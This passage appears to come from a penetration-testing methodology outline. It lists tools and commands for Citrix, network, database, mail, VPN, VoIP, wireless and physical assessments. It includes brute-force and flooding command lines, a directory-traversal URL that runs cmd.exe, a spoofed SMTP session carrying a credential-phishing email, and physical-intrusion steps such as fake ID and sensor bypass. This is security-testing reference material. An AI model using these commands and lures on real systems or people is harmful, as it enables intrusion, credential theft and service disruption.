22.2.5.1.3. Citrix SSL Relay

22.2.5.1.4. ICA sessions

22.2.5.1.5. Server to server

22.2.5.1.6. Management Console to server

22.2.5.1.7. Session Reliability (Auto-reconnect)

22.2.5.1.8. License Management Console

22.2.5.1.9. License server

22.2.5.2. UDP

22.2.5.2.1. Clients to ICA browser service

22.2.5.2.2. Server-to-server

22.2.6. nmap nse scripts

22.2.6.1. citrix-enum-apps

22.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

22.2.6.2. citrix-enum-apps-xml

22.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

22.2.6.3. citrix-enum-servers

22.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

22.2.6.4. citrix-enum-servers-xml

22.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

22.2.6.5. citrix-brute-xml

22.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

22.3. Scanning

22.3.1. Nessus

22.3.1.1. Plugins

22.3.1.1.1. CGI abuses

22.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

22.3.1.1.3. Misc.

22.3.1.1.4. Service Detection

22.3.1.1.5. Web Servers

22.3.1.1.6. Windows

22.3.2. Nikto

22.3.2.1. perl nikto.pl -host ip_address -port port_no.

22.3.2.1.1. Untitled

22.4. Exploitation

22.4.1. Alter default .ica files

22.4.1.1. InitialProgram=cmd.exe

22.4.1.2. InitialProgram=explorer.exe

22.4.2. Enumerate and Connect

22.4.2.1. For applications identified by Citrix-pa-scan

22.4.2.1.1. Pas

22.4.2.2. For published applications with a Citrix client when the master browser is non-public.

22.4.2.2.1. Citrix-pa-proxy

22.5. Brute Force

22.5.1. bforce.js

22.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

22.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

22.5.1.3. Untitled

22.6. Review Configuration Files

22.6.1. Application server configuration file

22.6.1.1. appsrv.ini

22.6.1.1.1. Location

22.6.1.1.2. World writeable

22.6.1.1.3. Review other files

22.6.1.1.4. Sample file

22.6.2. Program Neighborhood configuration file

22.6.2.1. pn.ini

22.6.2.1.1. Location

22.6.2.1.2. Review other files

22.6.2.1.3. Sample file

22.6.3. Citrix ICA client configuration file

22.6.3.1. wfclient.ini

22.6.3.1.1. Location

22.7. References

22.7.1. Vulnerabilities

22.7.1.1. Art of Hacking

22.7.1.2. Common Vulnerabilities and Exploits (CVE)

22.7.1.2.1. Sample file

22.7.1.2.2. Untitled

22.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

22.7.1.3. OSVDB

22.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

22.7.1.4. Secunia

22.7.1.5. Security-database.com

22.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

22.7.1.6. SecurityFocus

22.7.2. Support

22.7.2.1. Citrix

22.7.2.1.1. Knowledge Base

22.7.2.2. Thinworld

22.7.3. Exploits

22.7.3.1. Milw0rm

22.7.3.1.1. http://www.milw0rm.com/search.php

22.7.3.2. Art of Hacking

22.7.3.2.1. Citrix

22.7.4. Tools Resource

22.7.4.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

23. Network Backbone

23.1. Generic Toolset

23.1.1. Wireshark (Formerly Ethereal)

23.1.1.1. Passive Sniffing

23.1.1.1.1. Usernames/Passwords

23.1.1.1.2. Email

23.1.1.1.3. FTP

23.1.1.1.4. HTTP

23.1.1.1.5. HTTPS

23.1.1.1.6. RDP

23.1.1.1.7. VOIP

23.1.1.1.8. Other

23.1.1.2. Filters

23.1.1.2.1. ip.src == ip_address

23.1.1.2.2. ip.dst == ip_address

23.1.1.2.3. tcp.dstport == port_no.

23.1.1.2.4. ! ip.addr == ip_address

23.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

23.1.2. Cain & Abel

23.1.2.1. Active Sniffing

23.1.2.1.1. ARP Cache Poisoning

23.1.2.1.2. DNS Poisoning

23.1.2.1.3. Routing Protocols

23.1.3. Cisco-Torch

23.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

23.1.4. NTP-Fingerprint

23.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

23.1.5. Yersinia

23.1.6. p0f

23.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

23.1.7. Manual Check (Credentials required)

23.1.8. MAC Spoofing

23.1.8.1. mac address changer for windows

23.1.8.2. macchanger

23.1.8.2.1. Random Mac Address:- macchanger -r eth0

23.1.8.3. madmacs

23.1.8.4. smac

23.1.8.5. TMAC

24. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

24.1. Password Attacks

24.1.1. Known Accounts

24.1.1.1. Identified Passwords

24.1.1.2. Unidentified Hashes

24.1.2. Default Accounts

24.1.2.1. Identified Passwords

24.1.2.2. Unidentified Hashes

24.2. Exploits

24.2.1. Successful Exploits

24.2.1.1. Accounts

24.2.1.1.1. Passwords

24.2.1.1.2. Groups

24.2.1.1.3. Other Details

24.2.1.2. Services

24.2.1.3. Backdoor

24.2.1.4. Connectivity

24.2.2. Unsuccessful Exploits

24.2.3. Resources

24.2.3.1. Securiteam

24.2.3.1.1. Exploits are sorted by year and must be downloaded individually

24.2.3.2. SecurityForest

24.2.3.2.1. Updated via CVS after initial install

24.2.3.3. GovernmentSecurity

24.2.3.3.1. Need to create and account to obtain access

24.2.3.4. Red Base Security

24.2.3.4.1. Oracle Exploit site only

24.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

24.2.3.5.1. Wireless Exploit Site

24.2.3.6. PacketStorm Security

24.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

24.2.3.7. SecWatch

24.2.3.7.1. Exploits sorted by year and month, download seperately

24.2.3.8. SecurityFocus

24.2.3.8.1. Exploits must be downloaded individually

24.2.3.9. Metasploit

24.2.3.9.1. Install and regualrly update via svn

24.2.3.10. Milw0rm

24.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

24.3. Tools

24.3.1. Metasploit

24.3.1.1. Free Extra Modules

24.3.1.1.1. local copy

24.3.2. Manual SQL Injection

24.3.2.1. Understanding SQL Injection

24.3.2.2. SQL Injection walkthrough

24.3.2.3. SQL Injection by example

24.3.2.4. Blind SQL Injection

24.3.2.5. Advanced SQL Injection in SQL Server

24.3.2.6. More Advanced SQL Injection

24.3.2.7. Advanced SQL Injection in Oracle databases

24.3.2.8. SQL Cheatsheets

24.3.2.8.1. Untitled

24.3.3. SQL Power Injector

24.3.4. SecurityForest

24.3.5. SPI Dynamics WebInspect

24.3.6. Core Impact

24.3.7. Cisco Global Exploiter

24.3.8. PIXDos

24.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

24.3.9. CANVAS

24.3.10. Inguma

25. Server Specific Tests

25.1. Databases

25.1.1. Direct Access Interrogation

25.1.1.1. MS SQL Server

25.1.1.1.1. Ports

25.1.1.1.2. Version

25.1.1.1.3. osql

25.1.1.2. Oracle

25.1.1.2.1. Ports

25.1.1.2.2. TNS Listener

25.1.1.2.3. SQL Plus

25.1.1.2.4. Default Account/Passwords

25.1.1.2.5. Default SID's

25.1.1.3. MySQL

25.1.1.3.1. Ports

25.1.1.3.2. Version

25.1.1.3.3. Users/Passwords

25.1.1.4. DB2

25.1.1.5. Informix

25.1.1.6. Sybase

25.1.1.7. Other

25.1.2. Scans

25.1.2.1. Default Ports

25.1.2.2. Non-Default Ports

25.1.2.3. Instance Names

25.1.2.4. Versions

25.1.3. Password Attacks

25.1.3.1. Sniffed Passwords

25.1.3.1.1. Cracked Passwords

25.1.3.1.2. Hashes

25.1.3.2. Direct Access Guesses

25.1.4. Vulnerability Assessment

25.1.4.1. Automated

25.1.4.1.1. Reports

25.1.4.1.2. Vulnerabilities

25.1.4.2. Manual

25.1.4.2.1. Patch Levels

25.1.4.2.2. Confirmed Vulnerabilities

25.2. Mail

25.2.1. Scans

25.2.2. Fingerprint

25.2.2.1. Manual

25.2.2.2. Automated

25.2.3. Spoofable

25.2.3.1. Telnet spoof

25.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected]

25.2.4. Relays

25.3. VPN

25.3.1. Scanning

25.3.1.1. 500 UDP IPSEC

25.3.1.2. 1723 TCP PPTP

25.3.1.3. 443 TCP/SSL

25.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

25.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

25.3.2. Fingerprinting

25.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

25.3.3. PSK Crack

25.3.3.1. ikeprobe 80.75.68.27

25.3.3.2. sniff for responses with C&A or ikecrack

25.4. Web

25.4.1. Vulnerability Assessment

25.4.1.1. Automated

25.4.1.1.1. Reports

25.4.1.1.2. Vulnerabilities

25.4.1.2. Manual

25.4.1.2.1. Patch Levels

25.4.1.2.2. Confirmed Vulnerabilities

25.4.2. Permissions

25.4.2.1. PUT /test.txt HTTP/1.0

25.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

25.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

25.4.3. Scans

25.4.4. Fingerprinting

25.4.4.1. Other

25.4.4.2. HTTP

25.4.4.2.1. Commands

25.4.4.2.2. Modules

25.4.4.2.3. File Extensions

25.4.4.3. HTTPS

25.4.4.3.1. Commands

25.4.4.3.2. Commands

25.4.4.3.3. File Extensions

25.4.5. Directory Traversal

25.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

26. VoIP Security

26.1. Sniffing Tools

26.1.1. AuthTool

26.1.2. Cain & Abel

26.1.3. Etherpeek

26.1.4. NetDude

26.1.5. Oreka

26.1.6. PSIPDump

26.1.7. SIPomatic

26.1.8. SIPv6 Analyzer

26.1.9. UCSniff

26.1.10. VoiPong

26.1.11. VOMIT

26.1.12. Wireshark

26.1.13. WIST - Web Interface for SIP Trace

26.2. Scanning and Enumeration Tools

26.2.1. enumIAX

26.2.2. fping

26.2.3. IAX Enumerator

26.2.4. iWar

26.2.5. Nessus

26.2.6. Nmap

26.2.7. SIP Forum Test Framework (SFTF)

26.2.8. SIPcrack

26.2.9. sipflanker

26.2.9.1. python sipflanker.py 192.168.1-254

26.2.10. SIP-Scan

26.2.11. SIP.Tastic

26.2.12. SIPVicious

26.2.13. SiVuS

26.2.14. SMAP

26.2.14.1. smap IP_Address/Subnet_Mask

26.2.14.2. smap -o IP_Address/Subnet_Mask

26.2.14.3. smap -l IP_Address

26.2.15. snmpwalk

26.2.16. VLANping

26.2.17. VoIPAudit

26.2.18. VoIP GHDB Entries

26.2.19. VoIP Voicemail Database

26.3. Packet Creation and Flooding Tools

26.3.1. H.323 Injection Files

26.3.2. H225regreject

26.3.3. IAXHangup

26.3.4. IAXAuthJack

26.3.5. IAX.Brute

26.3.6. IAXFlooder

26.3.6.1. ./iaxflood sourcename destinationname numpackets

26.3.7. INVITE Flooder

26.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

26.3.8. kphone-ddos

26.3.9. RTP Flooder

26.3.10. rtpbreak

26.3.11. Scapy

26.3.12. Seagull

26.3.13. SIPBomber

26.3.14. SIPNess

26.3.15. SIPp

26.3.16. SIPsak

26.3.16.1. Tracing paths: - sipsak -T -s sip:[email protected]

26.3.16.2. Options request:- sipsak -vv -s sip:[email protected]

26.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

26.3.17. SIP-Send-Fun

26.3.18. SIPVicious

26.3.19. Spitter

26.3.20. TFTP Brute Force

26.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

26.3.21. UDP Flooder

26.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

26.3.22. UDP Flooder (with VLAN Support)

26.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

26.3.23. Voiphopper

26.4. Fuzzing Tools

26.4.1. Asteroid

26.4.2. Codenomicon VoIP Fuzzers

26.4.3. Fuzzy Packet

26.4.4. Mu Security VoIP Fuzzing Platform

26.4.5. ohrwurm RTP Fuzzer

26.4.6. PROTOS H.323 Fuzzer

26.4.7. PROTOS SIP Fuzzer

26.4.8. SIP Forum Test Framework (SFTF)

26.4.9. Sip-Proxy

26.5. Signaling Manipulation Tools

26.5.1. AuthTool

26.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

26.5.2. BYE Teardown

26.5.3. Check Sync Phone Rebooter

26.5.4. RedirectPoison

26.5.5. Registration Adder

26.5.6. Registration Eraser

26.5.7. Registration Hijacker

26.5.8. SIP-Kill

26.5.9. SIP-Proxy-Kill

26.5.10. SIP-RedirectRTP

26.5.11. vnak

26.6. Media Manipulation Tools

26.6.1. RTP InsertSound

26.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.2. RTP MixSound

26.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.3. RTPProxy

26.6.4. RTPInject

26.7. Generic Software Suites

26.7.1. OAT Office Communication Server Tool Assessment

26.7.2. EnableSecurity VOIPPACK

26.7.2.1. Note: - Add-on for Immunity Canvas

26.8. References

26.8.1. URL's

26.8.1.1. Common Vulnerabilities and Exploits (CVE)

26.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

26.8.1.2. Default Passwords

26.8.1.3. Hacking Exposed VoIP

26.8.1.3.1. Tool Pre-requisites

26.8.1.4. VoIPsa

26.8.2. White Papers

26.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

26.8.2.2. An Analysis of VoIP Security Threats and Tools

26.8.2.3. Hacking VoIP Exposed

26.8.2.4. Security testing of SIP implementations

26.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

26.8.2.6. Two attacks against VoIP

26.8.2.7. VoIP Attacks!

26.8.2.8. VoIP Security Audit Program (VSAP)

26.8.3. Spirent ThreatEx

27. Wireless Penetration

27.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

27.1.1. Site Map

27.1.1.1. RF Map

27.1.1.1.1. Lines of Sight

27.1.1.1.2. Signal Coverage

27.1.1.2. Physical Map

27.1.1.2.1. Triangulate APs

27.1.1.2.2. Satellite Imagery

27.1.2. Network Map

27.1.2.1. MAC Filter

27.1.2.1.1. Authorised MAC Addresses

27.1.2.1.2. Reaction to Spoofed MAC Addresses

27.1.2.2. Encryption Keys utilised

27.1.2.2.1. WEP

27.1.2.2.2. WPA/PSK

27.1.2.2.3. 802.1x

27.1.2.3. Access Points

27.1.2.3.1. ESSID

27.1.2.3.2. BSSIDs

27.1.2.4. Wireless Clients

27.1.2.4.1. MAC Addresses

27.1.2.4.2. Intercepted Traffic

27.2. SipRogue

27.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

27.4. Wireless Toolkit

27.4.1. Wireless Discovery

27.4.1.1. Aerosol

27.4.1.2. Airfart

27.4.1.3. Aphopper

27.4.1.4. Apradar

27.4.1.5. BAFFLE

27.4.1.6. inSSIDer

27.4.1.7. iWEPPro

27.4.1.8. karma

27.4.1.9. KisMAC-ng

27.4.1.10. Kismet

27.4.1.11. MiniStumbler

27.4.1.12. Netstumbler

27.4.1.13. Vistumbler

27.4.1.14. Wellenreiter

27.4.1.15. Wifi Hopper

27.4.1.16. WirelessMon

27.4.1.17. WiFiFoFum

27.4.2. Packet Capture

27.4.2.1. Airopeek

27.4.2.2. Airpcap

27.4.2.3. Airtraf

27.4.2.4. Apsniff

27.4.2.5. Cain

27.4.2.6. Commview

27.4.2.7. Ettercap

27.4.2.8. Netmon

27.4.2.8.1. nmwifi

27.4.2.9. Wireshark

27.4.3. EAP Attack tools

27.4.3.1. eapmd5pass

27.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

27.4.3.1.2. Untitled

27.4.4. Leap Attack Tools

27.4.4.1. asleap

27.4.4.2. thc leap cracker

27.4.4.3. anwrap

27.4.5. WEP/ WPA Password Attack Tools

27.4.5.1. Airbase

27.4.5.2. Aircrack-ptw

27.4.5.3. Aircrack-ng

27.4.5.4. Airsnort

27.4.5.5. cowpatty

27.4.5.6. FiOS Wireless Key Calculator

27.4.5.7. iWifiHack

27.4.5.8. KisMAC-ng

27.4.5.9. Rainbow Tables

27.4.5.10. wep attack

27.4.5.11. wep crack

27.4.5.12. wzcook

27.4.6. Frame Generation Software

27.4.6.1. Airgobbler

27.4.6.2. airpwn

27.4.6.3. Airsnarf

27.4.6.4. Commview

27.4.6.5. fake ap

27.4.6.6. void 11

27.4.6.7. wifi tap

27.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

27.4.6.8. FreeRADIUS - Wireless Pwnage Edition

27.4.7. Mapping Software

27.4.7.1. Online Mapping

27.4.7.1.1. WIGLE

27.4.7.1.2. Skyhook

27.4.7.2. Tools

27.4.7.2.1. Knsgem

27.4.8. File Format Conversion Tools

27.4.8.1. ns1 recovery and conversion tool

27.4.8.2. warbable

27.4.8.3. warkizniz

27.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

27.4.8.4. ivstools

27.4.9. IDS Tools

27.4.9.1. WIDZ

27.4.9.2. War Scanner

27.4.9.3. Snort-Wireless

27.4.9.4. AirDefense

27.4.9.5. AirMagnet

27.5. WLAN discovery

27.5.1. Unencrypted WLAN

27.5.1.1. Visible SSID

27.5.1.1.1. Sniff for IP range

27.5.1.2. Hidden SSID

27.5.1.2.1. Deauth client

27.5.2. WEP encrypted WLAN

27.5.2.1. Visible SSID

27.5.2.1.1. WEPattack

27.5.2.2. Hidden SSID

27.5.2.2.1. Deauth client

27.5.3. WPA / WPA2 encrypted WLAN

27.5.3.1. Deauth client

27.5.3.1.1. Capture EAPOL handshake

27.5.4. LEAP encrypted WLAN

27.5.4.1. Deauth client

27.5.4.1.1. Break LEAP

27.5.5. 802.1x WLAN

27.5.5.1. Create Rogue Access Point

27.5.5.1.1. Airsnarf

27.5.5.1.2. fake ap

27.5.5.1.3. Hotspotter

27.5.5.1.4. Karma

27.5.5.1.5. Linux rogue AP

27.5.6. Resources

27.5.6.1. URL's

27.5.6.1.1. Wirelessdefence.org

27.5.6.1.2. Russix

27.5.6.1.3. Wardrive.net

27.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

27.5.6.2. White Papers

27.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

27.5.6.2.2. 802.11b Firmware-Level Attacks

27.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

27.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

27.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds

27.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

27.5.6.2.7. Active behavioral fingerprinting of wireless devices

27.5.6.3. Common Vulnerabilities and Exploits (CVE)

27.5.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms

28.1.1.1. Check for active network jacks.

28.1.1.2. Check for any information in room.

28.1.2. Lobby

28.1.2.1. Check for active network jacks.

28.1.2.2. Does receptionist/guard leave lobby?

28.1.2.3. Accessbile printers? Print test page.

28.1.2.4. Obtain phone/personnel listing.

28.1.3. Communal Areas

28.1.3.1. Check for active network jacks.

28.1.3.2. Check for any information in room.

28.1.3.3. Listen for employee conversations.

28.1.4. Room Security

28.1.4.1. Resistance of lock to picking.

28.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

28.1.4.2. Ceiling access areas.

28.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows

28.1.5.1. Check windows/doors for visible intruderalarm sensors.

28.1.5.2. Check visible areas for sensitive information.

28.1.5.3. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security

28.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors

28.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

28.2.3. Guards

28.2.3.1. Patrol Routines

28.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

28.2.3.2. Communications

28.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

28.3. Entry Points

28.3.1. Guarded Doors

28.3.1.1. Piggybacking

28.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

28.3.1.2. Fake ID

28.3.1.2.1. Attempt to use fake ID to gain access.

28.3.1.3. Access Methods

28.3.1.3.1. Test 'out of hours' entry methods

28.3.2. Unguarded Doors

28.3.2.1. Identify all unguardedentry points.

28.3.2.1.1. Are doors secured?

28.3.2.1.2. Check locks for resistance to lock picking.

28.3.3. Windows

28.3.3.1. Check windows/doors for visible intruderalarm sensors.

28.3.3.1.1. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

29. Final Report - template

30. Contributors

30.1. Matt Byrne (WirelessDefence.org)

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (Paladion.net)

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (Dns.co.uk)

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (Security-database.com)